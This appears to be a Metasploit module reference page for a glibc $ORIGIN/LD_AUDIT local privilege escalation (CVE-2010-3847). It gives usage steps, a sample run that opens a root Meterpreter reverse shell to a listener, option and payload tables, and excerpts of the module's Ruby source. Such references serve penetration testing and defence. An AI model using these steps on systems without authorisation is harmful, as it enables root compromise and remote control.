glibc '$ORIGIN' Expansion Privilege Escalation - Metasploit


This page contains detailed information about how to use the exploit/linux/local/glibc_origin_expansion_priv_esc metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: glibc '$ORIGIN' Expansion Privilege Escalation
Module: exploit/linux/local/glibc_origin_expansion_priv_esc
Source code: modules/exploits/linux/local/glibc_origin_expansion_priv_esc.rb
Disclosure date: 2010-10-18
Last modification time: 2021-02-17 12:33:59 +0000
Supported architecture(s): x86, x64
Supported platform(s): Linux
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2010-3847

This module attempts to gain root privileges on Linux systems by abusing a vulnerability in the GNU C Library (glibc) dynamic linker. glibc ld.so versions before 2.11.3, and 2.12.x before 2.12.2 does not properly restrict use of the LD_AUDIT environment variable when loading setuid executables which allows control over the $ORIGIN library search path resulting in execution of arbitrary shared objects. This module opens a file descriptor to the specified suid executable via a hard link, then replaces the hard link with a shared object before instructing the linker to execute the file descriptor, resulting in arbitrary code execution. The specified setuid binary must be readable and located on the same file system partition as the specified writable directory. This module has been tested successfully on: glibc 2.5 on CentOS 5.4 (x86_64); glibc 2.5 on CentOS 5.5 (x86_64); glibc 2.12 on Fedora 13 (i386); and glibc 2.5-49 on RHEL 5.5 (x86_64). Some versions of ld.so, such as the version shipped with Ubuntu 14, hit a failed assertion in dl_open_worker causing exploitation to fail.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


Note: To run a local exploit, make sure you are at the msf prompt. Also, to check the session ID, use the sessions command.

msf > use exploit/linux/local/glibc_origin_expansion_priv_esc
msf exploit(glibc_origin_expansion_priv_esc) > show targets
    ... a list of targets ...
msf exploit(glibc_origin_expansion_priv_esc) > set TARGET target-id
msf exploit(glibc_origin_expansion_priv_esc) > show options
    ... show and set options ...
msf exploit(glibc_origin_expansion_priv_esc) > set SESSION session-id
msf exploit(glibc_origin_expansion_priv_esc) > exploit

Required Options


  • SESSION: The session to run this module on.

Knowledge Base


Description


This module attempts to gain root privileges on Linux systems by abusing a vulnerability in the GNU C Library (glibc) dynamic linker.

Vulnerable Application


glibc ld.so versions before 2.11.3, and 2.12.x before 2.12.2 does not properly restrict use of the LD_AUDIT environment variable when loading setuid executables which allows control over the $ORIGIN library search path resulting in execution of arbitrary shared objects.

This module opens a file descriptor to the specified suid executable via a hard link, then replaces the hard link with a shared object before instructing the linker to execute the file descriptor, resulting in arbitrary code execution.

The specified setuid binary must be readable and located on the same file system partition as the specified writable directory.

This module has been tested successfully on:

  • glibc 2.5 on CentOS 5.4 (x86_64)
  • glibc 2.5 on CentOS 5.5 (x86_64)
  • glibc 2.12 on Fedora 13 (i386)
  • glibc 2.5-49 on RHEL 5.5 (x86_64)

Some versions of ld.so, such as the version shipped with Ubuntu 14, hit a failed assertion in dl_open_worker causing exploitation to fail.

Verification Steps


  1. Start msfconsole
  2. Get a session
  3. Do: use exploit/linux/local/glibc_origin_expansion_priv_esc
  4. Do: set SESSION [SESSION]
  5. Do: check
  6. Do: run
  7. You should get a new root session

Options


SESSION

Which session to use, which can be viewed with sessions

WritableDir

A writable directory file system path. (default: /tmp)

Scenarios


  msf > use exploit/linux/local/glibc_origin_expansion_priv_esc 
  msf exploit(linux/local/glibc_origin_expansion_priv_esc) > set session 1
  session => 1
  msf exploit(linux/local/glibc_origin_expansion_priv_esc) > run

  [*] Started reverse TCP handler on 172.16.191.244:4444 
  [+] The target appears to be vulnerable
  [*] Using target: Linux x86
  [*] Writing '/tmp/.R5Ork' (1279 bytes) ...
  [*] Writing '/tmp/.yE35DWbLd' (320 bytes) ...
  [*] Writing '/tmp/.sk7Z3Vl7vJ' (207 bytes) ...
  [*] Launching exploit...
  [*] Sending stage (857352 bytes) to 172.16.191.138
  [*] Meterpreter session 2 opened (172.16.191.244:4444 -> 172.16.191.138:59187) at 2018-01-27 04:21:24 -0500

  meterpreter > getuid
  Server username: uid=0, gid=0, euid=0, egid=0
  meterpreter > sysinfo
  Computer     : fedora13.localdomain
  OS           : Fedora 13 (Linux 2.6.33.3-85.fc13.i686.PAE)
  Architecture : i686
  BuildTuple   : i486-linux-musl
  Meterpreter  : x86/linux
  meterpreter >

Go back to menu.

Msfconsole Usage


Here is how the linux/local/glibc_origin_expansion_priv_esc exploit module looks in the msfconsole:

msf6 > use exploit/linux/local/glibc_origin_expansion_priv_esc

[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/glibc_origin_expansion_priv_esc) > show info

       Name: glibc '$ORIGIN' Expansion Privilege Escalation
     Module: exploit/linux/local/glibc_origin_expansion_priv_esc
   Platform: Linux
       Arch: x86, x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2010-10-18

Provided by:
  Tavis Ormandy
  bcoles <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Automatic
  1   Linux x86
  2   Linux x64

Check supported:
  Yes

Basic options:
  Name             Current Setting  Required  Description
  ----             ---------------  --------  -----------
  SESSION                           yes       The session to run this module on.
  SUID_EXECUTABLE  /bin/ping        yes       Path to a suid executable

Payload information:

Description:
  This module attempts to gain root privileges on Linux systems by 
  abusing a vulnerability in the GNU C Library (glibc) dynamic linker. 
  glibc `ld.so` versions before 2.11.3, and 2.12.x before 2.12.2 does 
  not properly restrict use of the `LD_AUDIT` environment variable 
  when loading setuid executables which allows control over the 
  `$ORIGIN` library search path resulting in execution of arbitrary 
  shared objects. This module opens a file descriptor to the specified 
  suid executable via a hard link, then replaces the hard link with a 
  shared object before instructing the linker to execute the file 
  descriptor, resulting in arbitrary code execution. The specified 
  setuid binary must be readable and located on the same file system 
  partition as the specified writable directory. This module has been 
  tested successfully on: glibc 2.5 on CentOS 5.4 (x86_64); glibc 2.5 
  on CentOS 5.5 (x86_64); glibc 2.12 on Fedora 13 (i386); and glibc 
  2.5-49 on RHEL 5.5 (x86_64). Some versions of `ld.so`, such as the 
  version shipped with Ubuntu 14, hit a failed assertion in 
  `dl_open_worker` causing exploitation to fail.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2010-3847
  http://www.securityfocus.com/bid/44154
  https://www.exploit-db.com/exploits/15274
  https://seclists.org/fulldisclosure/2010/Oct/257
  https://www.ubuntu.com/usn/usn-1009-1
  https://security-tracker.debian.org/tracker/CVE-2010-3847
  https://access.redhat.com/security/cve/CVE-2010-3847

Module Options


This is a complete list of options available in the linux/local/glibc_origin_expansion_priv_esc exploit:

msf6 exploit(linux/local/glibc_origin_expansion_priv_esc) > show options

Module options (exploit/linux/local/glibc_origin_expansion_priv_esc):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on.
   SUID_EXECUTABLE  /bin/ping        yes       Path to a suid executable

Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

Advanced Options


Here is a complete list of advanced options supported by the linux/local/glibc_origin_expansion_priv_esc exploit:

msf6 exploit(linux/local/glibc_origin_expansion_priv_esc) > show advanced

Module advanced options (exploit/linux/local/glibc_origin_expansion_priv_esc):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EXE::Custom                              no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR              false            no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack           false            no        Use the default template in case the specified one is missing
   EXE::Inject             false            no        Set to preserve the original EXE function
   EXE::OldMethod          false            no        Set to use the substitution EXE generation method.
   EXE::Path                                no        The directory in which to look for the executable template
   EXE::Template                            no        The executable template file name.
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   FileDropperDelay                         no        Delay in seconds before attempting cleanup
   MSI::Custom                              no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR              false            no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                no        The directory in which to look for the msi template
   MSI::Template                            no        The msi template file name
   MSI::UAC                false            no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                2                no        Additional delay in seconds to wait for a session
   WritableDir             /tmp             yes       A directory where we can write files

Payload advanced options (linux/x64/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AppendExit                   false            no        Append a stub that executes the exit(0) system call
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   MeterpreterDebugLevel        0                yes       Set debug level for meterpreter 0-3 (Default output is strerr)
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   PrependChrootBreak           false            no        Prepend a stub that will break out of a chroot (includes setreuid to root)
   PrependFork                  false            no        Prepend a stub that starts the payload in its own process via fork
   PrependSetgid                false            no        Prepend a stub that executes the setgid(0) system call
   PrependSetregid              false            no        Prepend a stub that executes the setregid(0, 0) system call
   PrependSetresgid             false            no        Prepend a stub that executes the setresgid(0, 0, 0) system call
   PrependSetresuid             false            no        Prepend a stub that executes the setresuid(0, 0, 0) system call
   PrependSetreuid              false            no        Prepend a stub that executes the setreuid(0, 0) system call
   PrependSetuid                false            no        Prepend a stub that executes the setuid(0) system call
   RemoteMeterpreterDebugFile                    no        Redirect Debug Info to a Log File
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/local/glibc_origin_expansion_priv_esc module can exploit:

msf6 exploit(linux/local/glibc_origin_expansion_priv_esc) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic
   1   Linux x86
   2   Linux x64

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/local/glibc_origin_expansion_priv_esc exploit:

msf6 exploit(linux/local/glibc_origin_expansion_priv_esc) > show payloads

Compatible Payloads
===================

   #   Name                                              Disclosure Date  Rank    Check  Description
   -   ----                                              ---------------  ----    -----  -----------
   0   payload/generic/custom                                             normal  No     Custom Payload
   1   payload/generic/debug_trap                                         normal  No     Generic x86 Debug Trap
   2   payload/generic/shell_bind_tcp                                     normal  No     Generic Command Shell, Bind TCP Inline
   3   payload/generic/shell_reverse_tcp                                  normal  No     Generic Command Shell, Reverse TCP Inline
   4   payload/generic/tight_loop                                         normal  No     Generic x86 Tight Loop
   5   payload/linux/x64/exec                                             normal  No     Linux Execute Command
   6   payload/linux/x64/meterpreter/bind_tcp                             normal  No     Linux Mettle x64, Bind TCP Stager
   7   payload/linux/x64/meterpreter/reverse_tcp                          normal  No     Linux Mettle x64, Reverse TCP Stager
   8   payload/linux/x64/meterpreter_reverse_http                         normal  No     Linux Meterpreter, Reverse HTTP Inline
   9   payload/linux/x64/meterpreter_reverse_https                        normal  No     Linux Meterpreter, Reverse HTTPS Inline
   10  payload/linux/x64/meterpreter_reverse_tcp                          normal  No     Linux Meterpreter, Reverse TCP Inline
   11  payload/linux/x64/shell/bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Stager
   12  payload/linux/x64/shell/reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Stager
   13  payload/linux/x64/shell_bind_ipv6_tcp                              normal  No     Linux x64 Command Shell, Bind TCP Inline (IPv6)
   14  payload/linux/x64/shell_bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Inline
   15  payload/linux/x64/shell_bind_tcp_random_port                       normal  No     Linux Command Shell, Bind TCP Random Port Inline
   16  payload/linux/x64/shell_reverse_ipv6_tcp                           normal  No     Linux x64 Command Shell, Reverse TCP Inline (IPv6)
   17  payload/linux/x64/shell_reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Inline
   18  payload/linux/x86/chmod                                            normal  No     Linux Chmod
   19  payload/linux/x86/exec                                             normal  No     Linux Execute Command
   20  payload/linux/x86/meterpreter/bind_ipv6_tcp                        normal  No     Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)
   21  payload/linux/x86/meterpreter/bind_ipv6_tcp_uuid                   normal  No     Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   22  payload/linux/x86/meterpreter/bind_nonx_tcp                        normal  No     Linux Mettle x86, Bind TCP Stager
   23  payload/linux/x86/meterpreter/bind_tcp                             normal  No     Linux Mettle x86, Bind TCP Stager (Linux x86)
   24  payload/linux/x86/meterpreter/bind_tcp_uuid                        normal  No     Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86)
   25  payload/linux/x86/meterpreter/reverse_ipv6_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager (IPv6)
   26  payload/linux/x86/meterpreter/reverse_nonx_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager
   27  payload/linux/x86/meterpreter/reverse_tcp                          normal  No     Linux Mettle x86, Reverse TCP Stager
   28  payload/linux/x86/meterpreter/reverse_tcp_uuid                     normal  No     Linux Mettle x86, Reverse TCP Stager
   29  payload/linux/x86/meterpreter_reverse_http                         normal  No     Linux Meterpreter, Reverse HTTP Inline
   30  payload/linux/x86/meterpreter_reverse_https                        normal  No     Linux Meterpreter, Reverse HTTPS Inline
   31  payload/linux/x86/meterpreter_reverse_tcp                          normal  No     Linux Meterpreter, Reverse TCP Inline
   32  payload/linux/x86/metsvc_bind_tcp                                  normal  No     Linux Meterpreter Service, Bind TCP
   33  payload/linux/x86/metsvc_reverse_tcp                               normal  No     Linux Meterpreter Service, Reverse TCP Inline
   34  payload/linux/x86/read_file                                        normal  No     Linux Read File
   35  payload/linux/x86/shell/bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)
   36  payload/linux/x86/shell/bind_ipv6_tcp_uuid                         normal  No     Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   37  payload/linux/x86/shell/bind_nonx_tcp                              normal  No     Linux Command Shell, Bind TCP Stager
   38  payload/linux/x86/shell/bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Stager (Linux x86)
   39  payload/linux/x86/shell/bind_tcp_uuid                              normal  No     Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)
   40  payload/linux/x86/shell/reverse_ipv6_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager (IPv6)
   41  payload/linux/x86/shell/reverse_nonx_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager
   42  payload/linux/x86/shell/reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Stager
   43  payload/linux/x86/shell/reverse_tcp_uuid                           normal  No     Linux Command Shell, Reverse TCP Stager
   44  payload/linux/x86/shell_bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind TCP Inline (IPv6)
   45  payload/linux/x86/shell_bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Inline
   46  payload/linux/x86/shell_bind_tcp_random_port                       normal  No     Linux Command Shell, Bind TCP Random Port Inline
   47  payload/linux/x86/shell_reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Inline
   48  payload/linux/x86/shell_reverse_tcp_ipv6                           normal  No     Linux Command Shell, Reverse TCP Inline (IPv6)

Evasion Options


Here is the full list of possible evasion options supported by the linux/local/glibc_origin_expansion_priv_esc exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/local/glibc_origin_expansion_priv_esc) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Could not determine the GNU C library version


Here is a relevant code snippet related to the "Could not determine the GNU C library version" error message:

88:	  end
89:	
90:	  def check
91:	    v = Rex::Version.new glibc_version
92:	    if v.eql? ''
93:	      vprint_error 'Could not determine the GNU C library version'
94:	      return CheckCode::Safe
95:	    end
96:	
97:	    if v >= Rex::Version.new('2.12.2') ||
98:	       (v >= Rex::Version.new('2.11.3') && v < Rex::Version.new('2.12'))

GNU C Library version <V> is not vulnerable


Here is a relevant code snippet related to the "GNU C Library version <V> is not vulnerable" error message:

94:	      return CheckCode::Safe
95:	    end
96:	
97:	    if v >= Rex::Version.new('2.12.2') ||
98:	       (v >= Rex::Version.new('2.11.3') && v < Rex::Version.new('2.12'))
99:	      vprint_error "GNU C Library version #{v} is not vulnerable"
100:	      return CheckCode::Safe
101:	    end
102:	    vprint_good "GNU C Library version #{v} appears vulnerable"
103:	
104:	    unless setuid? suid_exe_path

<SUID_EXE_PATH> is not setuid


Here is a relevant code snippet related to the "<SUID_EXE_PATH> is not setuid" error message:

100:	      return CheckCode::Safe
101:	    end
102:	    vprint_good "GNU C Library version #{v} appears vulnerable"
103:	
104:	    unless setuid? suid_exe_path
105:	      vprint_error "#{suid_exe_path} is not setuid"
106:	      return CheckCode::Detected
107:	    end
108:	    vprint_good "#{suid_exe_path} is setuid"
109:	
110:	    unless cmd_exec("test -r #{suid_exe_path} && echo true").include? 'true'

<SUID_EXE_PATH> is not readable


Here is a relevant code snippet related to the "<SUID_EXE_PATH> is not readable" error message:

106:	      return CheckCode::Detected
107:	    end
108:	    vprint_good "#{suid_exe_path} is setuid"
109:	
110:	    unless cmd_exec("test -r #{suid_exe_path} && echo true").include? 'true'
111:	      vprint_error("#{suid_exe_path} is not readable")
112:	      return CheckCode::Detected
113:	    end
114:	    vprint_good "#{suid_exe_path} is readable"
115:	
116:	    CheckCode::Appears

<SUID_EXE_PATH> is not suid or not readable


Here is a relevant code snippet related to the "<SUID_EXE_PATH> is not suid or not readable" error message:

132:	    check_status = check
133:	
134:	    if check_status == CheckCode::Appears
135:	      print_good 'The target appears to be vulnerable'
136:	    elsif check_status == CheckCode::Detected
137:	      fail_with Failure::BadConfig, "#{suid_exe_path} is not suid or not readable"
138:	    else
139:	      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
140:	    end
141:	
142:	    if is_root?

Target is not vulnerable


Here is a relevant code snippet related to the "Target is not vulnerable" error message:

134:	    if check_status == CheckCode::Appears
135:	      print_good 'The target appears to be vulnerable'
136:	    elsif check_status == CheckCode::Detected
137:	      fail_with Failure::BadConfig, "#{suid_exe_path} is not suid or not readable"
138:	    else
139:	      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
140:	    end
141:	
142:	    if is_root?
143:	      fail_with Failure::BadConfig, 'Session already has root privileges'
144:	    end

Session already has root privileges


Here is a relevant code snippet related to the "Session already has root privileges" error message:

138:	    else
139:	      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
140:	    end
141:	
142:	    if is_root?
143:	      fail_with Failure::BadConfig, 'Session already has root privileges'
144:	    end
145:	
146:	    unless writable? base_dir
147:	      fail_with Failure::BadConfig, "#{base_dir} is not writable"
148:	    end

<BASE_DIR> is not writable


Here is a relevant code snippet related to the "<BASE_DIR> is not writable" error message:

142:	    if is_root?
143:	      fail_with Failure::BadConfig, 'Session already has root privileges'
144:	    end
145:	
146:	    unless writable? base_dir
147:	      fail_with Failure::BadConfig, "#{base_dir} is not writable"
148:	    end
149:	
150:	    suid_partition = cmd_exec "df -P -- '#{suid_exe_path}' | awk 'NR==2 {print $1}'"
151:	    base_partition = cmd_exec "df -P -- '#{base_dir}' | awk 'NR==2 {print $1}'"
152:	    if suid_partition == base_partition

'<SUID_EXE_PATH>' and '<BASE_DIR>' are not located on the same partition


Here is a relevant code snippet related to the "'<SUID_EXE_PATH>' and '<BASE_DIR>' are not located on the same partition" error message:

150:	    suid_partition = cmd_exec "df -P -- '#{suid_exe_path}' | awk 'NR==2 {print $1}'"
151:	    base_partition = cmd_exec "df -P -- '#{base_dir}' | awk 'NR==2 {print $1}'"
152:	    if suid_partition == base_partition
153:	      vprint_good "'#{suid_exe_path}' and '#{base_dir}' are located on the same partition"
154:	    else
155:	      print_warning "'#{suid_exe_path}' and '#{base_dir}' are not located on the same partition"
156:	    end
157:	
158:	    payload_name = ".#{rand_text_alphanumeric 5..10}"
159:	    payload_path = "#{base_dir}/#{payload_name}"
160:	

Unable to automatically select a target


Here is a relevant code snippet related to the "Unable to automatically select a target" error message:

166:	      when 'x86_64'
167:	        my_target = targets[2]
168:	      when /x86/, /i\d86/
169:	        my_target = targets[1]
170:	      else
171:	        fail_with Failure::NoTarget, 'Unable to automatically select a target'
172:	      end
173:	    else
174:	      my_target = target
175:	    end
176:	    print_status "Using target: #{my_target.name}"

Target is not compatible


Here is a relevant code snippet related to the "Target is not compatible" error message:

180:	    when ARCH_X86
181:	      cpu = Metasm::Ia32.new
182:	    when ARCH_X64
183:	      cpu = Metasm::X86_64.new
184:	    else
185:	      fail_with Failure::NoTarget, 'Target is not compatible'
186:	    end
187:	
188:	    # Compile shared object
189:	    so_stub = %|
190:	      extern int setuid(int);

Metasm encoding failed: <VALUE>


Here is a relevant code snippet related to the "Metasm encoding failed: <VALUE>" error message:

201:	    |
202:	
203:	    begin
204:	      so = Metasm::ELF.compile_c(cpu, so_stub).encode_string(:lib)
205:	    rescue => e
206:	      print_error "Metasm encoding failed: #{$ERROR_INFO}"
207:	      elog('Metasm encoding failed', error: e)
208:	      fail_with Failure::Unknown, 'Metasm encoding failed'
209:	    end
210:	
211:	    # Upload shared object

Metasm encoding failed


Here is a relevant code snippet related to the "Metasm encoding failed" error message:

202:	
203:	    begin
204:	      so = Metasm::ELF.compile_c(cpu, so_stub).encode_string(:lib)
205:	    rescue => e
206:	      print_error "Metasm encoding failed: #{$ERROR_INFO}"
207:	      elog('Metasm encoding failed', error: e)
208:	      fail_with Failure::Unknown, 'Metasm encoding failed'
209:	    end
210:	
211:	    # Upload shared object
212:	    so_name = ".#{rand_text_alphanumeric 5..10}"

Metasm encoding failed


Here is a relevant code snippet related to the "Metasm encoding failed" error message:

203:	    begin
204:	      so = Metasm::ELF.compile_c(cpu, so_stub).encode_string(:lib)
205:	    rescue => e
206:	      print_error "Metasm encoding failed: #{$ERROR_INFO}"
207:	      elog('Metasm encoding failed', error: e)
208:	      fail_with Failure::Unknown, 'Metasm encoding failed'
209:	    end
210:	
211:	    # Upload shared object
212:	    so_name = ".#{rand_text_alphanumeric 5..10}"
213:	    so_path = "#{base_dir}/#{so_name}"

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • Tavis Ormandy
  • bcoles

Version


This page has been produced using Metasploit Framework version 6.1.28-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.